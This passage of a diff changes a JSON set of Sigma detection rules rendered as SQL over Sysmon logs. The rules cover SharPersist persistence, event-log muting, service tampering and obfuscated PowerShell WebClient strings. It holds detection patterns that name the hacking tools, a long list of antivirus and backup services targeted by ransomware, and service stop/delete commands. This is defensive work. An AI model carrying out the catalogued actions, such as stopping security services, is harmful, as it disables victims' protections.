"attack.persistence", - "attack.t1053" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" - }, - { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], - "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE 
'%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE 
'%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + 
"attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s 